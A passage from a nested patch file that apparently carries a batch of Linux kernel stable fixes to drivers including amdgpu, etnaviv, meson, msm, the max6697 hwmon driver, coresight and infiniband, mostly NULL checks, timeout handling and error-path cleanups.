++		return -ETIMEDOUT;
+ 
+ 	ret = mox_get_status(MBOX_CMD_ECDSA_PUB_KEY, reply->retval);
+ 	if (ret == -ENODATA) {
+@@ -274,9 +275,8 @@ static int check_get_random_support(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
++		return -ETIMEDOUT;
+ 
+ 	return mox_get_status(MBOX_CMD_GET_RANDOM, rwtm->reply.retval);
+ }
+@@ -499,6 +499,7 @@ static int turris_mox_rwtm_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, rwtm);
+ 
+ 	mutex_init(&rwtm->busy);
++	init_completion(&rwtm->cmd_done);
+ 
+ 	rwtm->mbox_client.dev = dev;
+ 	rwtm->mbox_client.rx_callback = mox_rwtm_rx_callback;
+@@ -512,8 +513,6 @@ static int turris_mox_rwtm_probe(struct platform_device *pdev)
+ 		goto remove_files;
+ 	}
+ 
+-	init_completion(&rwtm->cmd_done);
+-
+ 	ret = mox_get_board_info(rwtm);
+ 	if (ret < 0)
+ 		dev_warn(dev, "Cannot read board information: %i\n", ret);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 157441dd07041..d4faa489bd5fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -5815,7 +5815,7 @@ int amdgpu_device_baco_exit(struct drm_device *dev)
+ 	    adev->nbio.funcs->enable_doorbell_interrupt)
+ 		adev->nbio.funcs->enable_doorbell_interrupt(adev, true);
+ 
+-	if (amdgpu_passthrough(adev) &&
++	if (amdgpu_passthrough(adev) && adev->nbio.funcs &&
+ 	    adev->nbio.funcs->clear_doorbell_interrupt)
+ 		adev->nbio.funcs->clear_doorbell_interrupt(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index ea0fb079f942a..fd98d2508a22a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -583,7 +583,6 @@ void amdgpu_gmc_noretry_set(struct amdgpu_device *adev)
+ 	struct amdgpu_gmc *gmc = &adev->gmc;
+ 	uint32_t gc_ver = adev->ip_versions[GC_HWIP][0];
+ 	bool noretry_default = (gc_ver == IP_VERSION(9, 0, 1) ||
+-				gc_ver == IP_VERSION(9, 3, 0) ||
+ 				gc_ver == IP_VERSION(9, 4, 0) ||
+ 				gc_ver == IP_VERSION(9, 4, 1) ||
+ 				gc_ver == IP_VERSION(9, 4, 2) ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index c7af36370b0de..38f57455bc747 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -241,6 +241,14 @@ static void sdma_v5_2_ring_set_wptr(struct amdgpu_ring *ring)
+ 		DRM_DEBUG("calling WDOORBELL64(0x%08x, 0x%016llx)\n",
+ 				ring->doorbell_index, ring->wptr << 2);
+ 		WDOORBELL64(ring->doorbell_index, ring->wptr << 2);
++		/* SDMA seems to miss doorbells sometimes when powergating kicks in.
++		 * Updating the wptr directly will wake it. This is only safe because
++		 * we disallow gfxoff in begin_use() and then allow it again in end_use().
++		 */
++		WREG32(sdma_v5_2_get_reg_offset(adev, ring->me, mmSDMA0_GFX_RB_WPTR),
++		       lower_32_bits(ring->wptr << 2));
++		WREG32(sdma_v5_2_get_reg_offset(adev, ring->me, mmSDMA0_GFX_RB_WPTR_HI),
++		       upper_32_bits(ring->wptr << 2));
+ 	} else {
+ 		DRM_DEBUG("Not using doorbell -- "
+ 				"mmSDMA%i_GFX_RB_WPTR == 0x%08x "
+@@ -1705,6 +1713,10 @@ static void sdma_v5_2_ring_begin_use(struct amdgpu_ring *ring)
+ 	 * but it shouldn't hurt for other parts since
+ 	 * this GFXOFF will be disallowed anyway when SDMA is
+ 	 * active, this just makes it explicit.
++	 * sdma_v5_2_ring_set_wptr() takes advantage of this
++	 * to update the wptr because sometimes SDMA seems to miss
++	 * doorbells when entering PG.  If you remove this, update
++	 * sdma_v5_2_ring_set_wptr() as well!
+ 	 */
+ 	amdgpu_gfx_off_ctrl(adev, false);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_surface.c b/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
+index a80e45300783c..f4f3ca7aad60e 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
+@@ -154,7 +154,8 @@ const struct dc_plane_status *dc_plane_get_status(
+ 		if (pipe_ctx->plane_state != plane_state)
+ 			continue;
+ 
+-		pipe_ctx->plane_state->status.is_flip_pending = false;
++		if (pipe_ctx->plane_state)
++			pipe_ctx->plane_state->status.is_flip_pending = false;
+ 
+ 		break;
+ 	}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index f3257cf4b06f2..3aab1caed2ac7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -79,8 +79,8 @@ MODULE_FIRMWARE("amdgpu/smu_13_0_10.bin");
+ #define PCIE_LC_LINK_WIDTH_CNTL__LC_LINK_WIDTH_RD_MASK 0x00000070L
+ #define PCIE_LC_LINK_WIDTH_CNTL__LC_LINK_WIDTH_RD__SHIFT 0x4
+ #define smnPCIE_LC_SPEED_CNTL			0x11140290
+-#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE_MASK 0xC000
+-#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE__SHIFT 0xE
++#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE_MASK 0xE0
++#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE__SHIFT 0x5
+ 
+ static const int link_width[] = {0, 1, 2, 4, 8, 12, 16};
+ static const int link_speed[] = {25, 50, 80, 160};
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 72b2b171e533e..805f8455b8d64 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -2923,7 +2923,7 @@ static int drm_dp_send_link_address(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	/* FIXME: Actually do some real error handling here */
+ 	ret = drm_dp_mst_wait_tx_reply(mstb, txmsg);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		drm_err(mgr->dev, "Sending link address failed with %d\n", ret);
+ 		goto out;
+ 	}
+@@ -2975,7 +2975,7 @@ static int drm_dp_send_link_address(struct drm_dp_mst_topology_mgr *mgr,
+ 	mutex_unlock(&mgr->lock);
+ 
+ out:
+-	if (ret <= 0)
++	if (ret < 0)
+ 		mstb->link_address_sent = false;
+ 	kfree(txmsg);
+ 	return ret < 0 ? ret : changed;
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem.c b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+index 5cf13e52f7c94..23d5058eca8d8 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+@@ -355,9 +355,11 @@ static void *etnaviv_gem_vmap_impl(struct etnaviv_gem_object *obj)
+ 
+ static inline enum dma_data_direction etnaviv_op_to_dma_dir(u32 op)
+ {
+-	if (op & ETNA_PREP_READ)
++	op &= ETNA_PREP_READ | ETNA_PREP_WRITE;
++
++	if (op == ETNA_PREP_READ)
+ 		return DMA_FROM_DEVICE;
+-	else if (op & ETNA_PREP_WRITE)
++	else if (op == ETNA_PREP_WRITE)
+ 		return DMA_TO_DEVICE;
+ 	else
+ 		return DMA_BIDIRECTIONAL;
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_sched.c b/drivers/gpu/drm/etnaviv/etnaviv_sched.c
+index 72e2553fbc984..5d506767b8f24 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_sched.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_sched.c
+@@ -38,9 +38,6 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 	u32 dma_addr;
+ 	int change;
+ 
+-	/* block scheduler */
+-	drm_sched_stop(&gpu->sched, sched_job);
+-
+ 	/*
+ 	 * If the GPU managed to complete this job's fence, the timeout is
+ 	 * spurious. Bail out.
+@@ -62,6 +59,9 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 		goto out_no_timeout;
+ 	}
+ 
++	/* block scheduler */
++	drm_sched_stop(&gpu->sched, sched_job);
++
+ 	if(sched_job)
+ 		drm_sched_increase_karma(sched_job);
+ 
+@@ -75,8 +75,7 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 	return DRM_GPU_SCHED_STAT_NOMINAL;
+ 
+ out_no_timeout:
+-	/* restart scheduler after GPU is usable again */
+-	drm_sched_start(&gpu->sched, true);
++	list_add(&sched_job->list, &sched_job->sched->pending_list);
+ 	return DRM_GPU_SCHED_STAT_NOMINAL;
+ }
+ 
+diff --git a/drivers/gpu/drm/gma500/cdv_intel_lvds.c b/drivers/gpu/drm/gma500/cdv_intel_lvds.c
+index be6efcaaa3b3f..c9ad16960e82b 100644
+--- a/drivers/gpu/drm/gma500/cdv_intel_lvds.c
++++ b/drivers/gpu/drm/gma500/cdv_intel_lvds.c
+@@ -309,6 +309,9 @@ static int cdv_intel_lvds_get_modes(struct drm_connector *connector)
+ 	if (mode_dev->panel_fixed_mode != NULL) {
+ 		struct drm_display_mode *mode =
+ 		    drm_mode_duplicate(dev, mode_dev->panel_fixed_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		return 1;
+ 	}
+diff --git a/drivers/gpu/drm/gma500/psb_intel_lvds.c b/drivers/gpu/drm/gma500/psb_intel_lvds.c
+index 7ee6c8ce103b8..9842de0dad3af 100644
+--- a/drivers/gpu/drm/gma500/psb_intel_lvds.c
++++ b/drivers/gpu/drm/gma500/psb_intel_lvds.c
+@@ -502,6 +502,9 @@ static int psb_intel_lvds_get_modes(struct drm_connector *connector)
+ 	if (mode_dev->panel_fixed_mode != NULL) {
+ 		struct drm_display_mode *mode =
+ 		    drm_mode_duplicate(dev, mode_dev->panel_fixed_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		return 1;
+ 	}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index a27563bfd9097..3f65d890b8a90 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -4089,6 +4089,8 @@ int intel_dp_retrain_link(struct intel_encoder *encoder,
+ 		    !intel_dp_mst_is_master_trans(crtc_state))
+ 			continue;
+ 
++		intel_dp->link_trained = false;
++
+ 		intel_dp_check_frl_training(intel_dp);
+ 		intel_dp_pcon_dsc_configure(intel_dp, crtc_state);
+ 		intel_dp_start_link_train(intel_dp, crtc_state);
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index eae138b9f2df3..321dbecba0f3c 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3313,11 +3313,7 @@ static void remove_from_engine(struct i915_request *rq)
+ 
+ static bool can_preempt(struct intel_engine_cs *engine)
+ {
+-	if (GRAPHICS_VER(engine->i915) > 8)
+-		return true;
+-
+-	/* GPGPU on bdw requires extra w/a; not implemented */
+-	return engine->class != RENDER_CLASS;
++	return GRAPHICS_VER(engine->i915) > 8;
+ }
+ 
+ static void kick_execlists(const struct i915_request *rq, int prio)
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index 25639fbfd374a..905275df09800 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -598,6 +598,8 @@ static const struct of_device_id mtk_ddp_comp_dt_ids[] = {
+ 	  .data = (void *)MTK_DISP_OVL },
+ 	{ .compatible = "mediatek,mt8192-disp-ovl",
+ 	  .data = (void *)MTK_DISP_OVL },
++	{ .compatible = "mediatek,mt8195-disp-ovl",
++	  .data = (void *)MTK_DISP_OVL },
+ 	{ .compatible = "mediatek,mt8183-disp-ovl-2l",
+ 	  .data = (void *)MTK_DISP_OVL_2L },
+ 	{ .compatible = "mediatek,mt8192-disp-ovl-2l",
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_plane.c b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+index c4a0203d17e38..30d361671aa9c 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_plane.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+@@ -157,6 +157,8 @@ static void mtk_plane_atomic_async_update(struct drm_plane *plane,
+ 	plane->state->src_y = new_state->src_y;
+ 	plane->state->src_h = new_state->src_h;
+ 	plane->state->src_w = new_state->src_w;
++	plane->state->dst.x1 = new_state->dst.x1;
++	plane->state->dst.y1 = new_state->dst.y1;
+ 
+ 	mtk_plane_update_new_state(new_state, new_plane_state);
+ 	swap(plane->state->fb, new_state->fb);
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index fbac39aa38cc4..f0df41cf39a36 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -249,29 +249,20 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	if (ret)
+ 		goto free_drm;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_0);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_osd1;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_1);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_vd1_0;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_2);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_1);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_vd1_1;
+ 
+ 	priv->vsync_irq = platform_get_irq(pdev, 0);
+ 
+ 	ret = drm_vblank_init(drm, 1);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 
+ 	/* Assign limits per soc revision/package */
+ 	for (i = 0 ; i < ARRAY_SIZE(meson_drm_soc_attrs) ; ++i) {
+@@ -287,11 +278,11 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	 */
+ 	ret = drm_aperture_remove_framebuffers(&meson_driver);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 
+ 	ret = drmm_mode_config_init(drm);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 	drm->mode_config.max_width = 3840;
+ 	drm->mode_config.max_height = 2160;
+ 	drm->mode_config.funcs = &meson_mode_config_funcs;
+@@ -306,7 +297,7 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	if (priv->afbcd.ops) {
+ 		ret = priv->afbcd.ops->init(priv);
+ 		if (ret)
+-			goto free_drm;
++			goto free_canvas_vd1_2;
+ 	}
+ 
+ 	/* Encoder Initialization */
+@@ -364,6 +355,14 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
++free_canvas_vd1_2:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_2);
++free_canvas_vd1_1:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_1);
++free_canvas_vd1_0:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
++free_canvas_osd1:
++	meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+ free_drm:
+ 	drm_dev_put(drm);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 3632f0768aa9e..1bf41a82cd0f9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -1653,8 +1653,7 @@ void dpu_encoder_trigger_kickoff_pending(struct drm_encoder *drm_enc)
+ 		phys = dpu_enc->phys_encs[i];
+ 
+ 		ctl = phys->hw_ctl;
+-		if (ctl->ops.clear_pending_flush)
+-			ctl->ops.clear_pending_flush(ctl);
++		ctl->ops.clear_pending_flush(ctl);
+ 
+ 		/* update only for command mode primary ctl */
+ 		if ((phys == dpu_enc->cur_master) &&
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 42c7e378d504d..05a09d86e1838 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -548,8 +548,7 @@ static void dpu_encoder_phys_wb_disable(struct dpu_encoder_phys *phys_enc)
+ 	}
+ 
+ 	/* reset h/w before final flush */
+-	if (phys_enc->hw_ctl->ops.clear_pending_flush)
+-		phys_enc->hw_ctl->ops.clear_pending_flush(phys_enc->hw_ctl);
++	phys_enc->hw_ctl->ops.clear_pending_flush(phys_enc->hw_ctl);
+ 
+ 	/*
+ 	 * New CTL reset sequence from 5.0 MDP onwards.
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
+index 96c012ec84676..ec5265771cdf7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
+@@ -81,7 +81,8 @@ struct dpu_hw_ctl_ops {
+ 
+ 	/**
+ 	 * Clear the value of the cached pending_flush_mask
+-	 * No effect on hardware
++	 * No effect on hardware.
++	 * Required to be implemented.
+ 	 * @ctx       : ctl path ctx pointer
+ 	 */
+ 	void (*clear_pending_flush)(struct dpu_hw_ctl *ctx);
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index cd9ca36901611..034ad810fd653 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -848,6 +848,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	u32 slice_per_intf, total_bytes_per_intf;
+ 	u32 pkt_per_line;
+ 	u32 eol_byte_num;
++	u32 bytes_per_pkt;
+ 
+ 	/* first calculate dsc parameters and then program
+ 	 * compress mode registers
+@@ -855,6 +856,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+ 	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
++	bytes_per_pkt = dsc->slice_chunk_size; /* * slice_per_pkt; */
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+ 
+@@ -892,6 +894,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL, reg_ctrl);
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL2, reg_ctrl2);
+ 	} else {
++		reg |= DSI_VIDEO_COMPRESSION_MODE_CTRL_WC(bytes_per_pkt);
+ 		dsi_write(msm_host, REG_DSI_VIDEO_COMPRESSION_MODE_CTRL, reg);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index 1c008bd9102ff..820d8d29b62bd 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -1271,7 +1271,11 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 	usleep_range(10000, 11000);
+ 
+ 	if (boe->desc->lp11_before_reset) {
+-		mipi_dsi_dcs_nop(boe->dsi);
++		ret = mipi_dsi_dcs_nop(boe->dsi);
++		if (ret < 0) {
++			dev_err(&boe->dsi->dev, "Failed to send NOP: %d\n", ret);
++			goto poweroff;
++		}
+ 		usleep_range(1000, 2000);
+ 	}
+ 	gpiod_set_value(boe->enable_gpio, 1);
+@@ -1292,13 +1296,13 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 	return 0;
+ 
+ poweroff:
++	gpiod_set_value(boe->enable_gpio, 0);
+ 	regulator_disable(boe->avee);
+ poweroffavdd:
+ 	regulator_disable(boe->avdd);
+ poweroff1v8:
+ 	usleep_range(5000, 7000);
+ 	regulator_disable(boe->pp1800);
+-	gpiod_set_value(boe->enable_gpio, 0);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/panfrost/panfrost_drv.c b/drivers/gpu/drm/panfrost/panfrost_drv.c
+index 919e6cc049828..3c0aa8b5e1ae3 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_drv.c
++++ b/drivers/gpu/drm/panfrost/panfrost_drv.c
+@@ -704,3 +704,4 @@ module_platform_driver(panfrost_driver);
+ MODULE_AUTHOR("Panfrost Project Developers");
+ MODULE_DESCRIPTION("Panfrost DRM Driver");
+ MODULE_LICENSE("GPL v2");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+diff --git a/drivers/gpu/drm/qxl/qxl_display.c b/drivers/gpu/drm/qxl/qxl_display.c
+index f91a86225d5e7..462a4d2ac0b95 100644
+--- a/drivers/gpu/drm/qxl/qxl_display.c
++++ b/drivers/gpu/drm/qxl/qxl_display.c
+@@ -236,6 +236,9 @@ static int qxl_add_mode(struct drm_connector *connector,
+ 		return 0;
+ 
+ 	mode = drm_cvt_mode(dev, width, height, 60, false, false, false);
++	if (!mode)
++		return 0;
++
+ 	if (preferred)
+ 		mode->type |= DRM_MODE_TYPE_PREFERRED;
+ 	mode->hdisplay = width;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index a72642bb9cc60..80b8c83342840 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -1923,7 +1923,7 @@ static void vop2_setup_layer_mixer(struct vop2_video_port *vp)
+ 		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT2_MUX,
+ 			(vp2->nlayers + vp1->nlayers + vp0->nlayers - 1));
+ 	else
+-		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT1_MUX, 8);
++		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT2_MUX, 8);
+ 
+ 	layer_sel = vop2_readl(vop2, RK3568_OVL_LAYER_SEL);
+ 
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6a6ebcc896b1d..3ac6744276750 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1863,7 +1863,7 @@ static void adt7475_read_pwm(struct i2c_client *client, int index)
+ 		data->pwm[CONTROL][index] &= ~0xE0;
+ 		data->pwm[CONTROL][index] |= (7 << 5);
+ 
+-		i2c_smbus_write_byte_data(client, PWM_CONFIG_REG(index),
++		i2c_smbus_write_byte_data(client, PWM_REG(index),
+ 					  data->pwm[INPUT][index]);
+ 
+ 		i2c_smbus_write_byte_data(client, PWM_CONFIG_REG(index),
+diff --git a/drivers/hwmon/max6697.c b/drivers/hwmon/max6697.c
+index 2895cea541934..266baae94e3ee 100644
+--- a/drivers/hwmon/max6697.c
++++ b/drivers/hwmon/max6697.c
+@@ -312,6 +312,7 @@ static ssize_t temp_store(struct device *dev,
+ 		return ret;
+ 
+ 	mutex_lock(&data->update_lock);
++	temp = clamp_val(temp, -1000000, 1000000);	/* prevent underflow */
+ 	temp = DIV_ROUND_CLOSEST(temp, 1000) + data->temp_offset;
+ 	temp = clamp_val(temp, 0, data->type == max6581 ? 255 : 127);
+ 	data->temp[nr][index] = temp;
+@@ -429,14 +430,14 @@ static SENSOR_DEVICE_ATTR_RO(temp6_max_alarm, alarm, 20);
+ static SENSOR_DEVICE_ATTR_RO(temp7_max_alarm, alarm, 21);
+ static SENSOR_DEVICE_ATTR_RO(temp8_max_alarm, alarm, 23);
+ 
+-static SENSOR_DEVICE_ATTR_RO(temp1_crit_alarm, alarm, 14);
++static SENSOR_DEVICE_ATTR_RO(temp1_crit_alarm, alarm, 15);
+ static SENSOR_DEVICE_ATTR_RO(temp2_crit_alarm, alarm, 8);
+ static SENSOR_DEVICE_ATTR_RO(temp3_crit_alarm, alarm, 9);
+ static SENSOR_DEVICE_ATTR_RO(temp4_crit_alarm, alarm, 10);
+ static SENSOR_DEVICE_ATTR_RO(temp5_crit_alarm, alarm, 11);
+ static SENSOR_DEVICE_ATTR_RO(temp6_crit_alarm, alarm, 12);
+ static SENSOR_DEVICE_ATTR_RO(temp7_crit_alarm, alarm, 13);
+-static SENSOR_DEVICE_ATTR_RO(temp8_crit_alarm, alarm, 15);
++static SENSOR_DEVICE_ATTR_RO(temp8_crit_alarm, alarm, 14);
+ 
+ static SENSOR_DEVICE_ATTR_RO(temp2_fault, alarm, 1);
+ static SENSOR_DEVICE_ATTR_RO(temp3_fault, alarm, 2);
+diff --git a/drivers/hwtracing/coresight/coresight-platform.c b/drivers/hwtracing/coresight/coresight-platform.c
+index 4758997141046..3f82ae07a18e5 100644
+--- a/drivers/hwtracing/coresight/coresight-platform.c
++++ b/drivers/hwtracing/coresight/coresight-platform.c
+@@ -323,8 +323,10 @@ static int of_get_coresight_platform_data(struct device *dev,
+ 			continue;
+ 
+ 		ret = of_coresight_parse_endpoint(dev, ep, pdata);
+-		if (ret)
++		if (ret) {
++			of_node_put(ep);
+ 			return ret;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/iio/frequency/adrf6780.c b/drivers/iio/frequency/adrf6780.c
+index b4defb82f37e3..3f46032c92752 100644
+--- a/drivers/iio/frequency/adrf6780.c
++++ b/drivers/iio/frequency/adrf6780.c
+@@ -9,7 +9,6 @@
+ #include <linux/bits.h>
+ #include <linux/clk.h>
+ #include <linux/clkdev.h>
+-#include <linux/clk-provider.h>
+ #include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/iio/iio.h>
+diff --git a/drivers/infiniband/core/cache.c b/drivers/infiniband/core/cache.c
+index 4084d05a45102..c319664ca74b3 100644
+--- a/drivers/infiniband/core/cache.c
++++ b/drivers/infiniband/core/cache.c
+@@ -794,7 +794,6 @@ static struct ib_gid_table *alloc_gid_table(int sz)
+ static void release_gid_table(struct ib_device *device,
+ 			      struct ib_gid_table *table)
+ {
+-	bool leak = false;
+ 	int i;
+ 
+ 	if (!table)
+@@ -803,15 +802,12 @@ static void release_gid_table(struct ib_device *device,
+ 	for (i = 0; i < table->sz; i++) {
+ 		if (is_gid_entry_free(table->data_vec[i]))
+ 			continue;
+-		if (kref_read(&table->data_vec[i]->kref) > 1) {
+-			dev_err(&device->dev,
+-				"GID entry ref leak for index %d ref=%u\n", i,
+-				kref_read(&table->data_vec[i]->kref));
+-			leak = true;
+-		}
++
++		WARN_ONCE(true,
++			  "GID entry ref leak for dev %s index %d ref=%u\n",
++			  dev_name(&device->dev), i,
++			  kref_read(&table->data_vec[i]->kref));
+ 	}
+-	if (leak)
+-		return;
+ 
+ 	mutex_destroy(&table->lock);
+ 	kfree(table->data_vec);
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 453188db39d83..291ded20934c8 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -2146,6 +2146,9 @@ int ib_device_set_netdev(struct ib_device *ib_dev, struct net_device *ndev,
+ 	unsigned long flags;
+ 	int ret;
+ 
++	if (!rdma_is_port_valid(ib_dev, port))
++		return -EINVAL;
++
+ 	/*
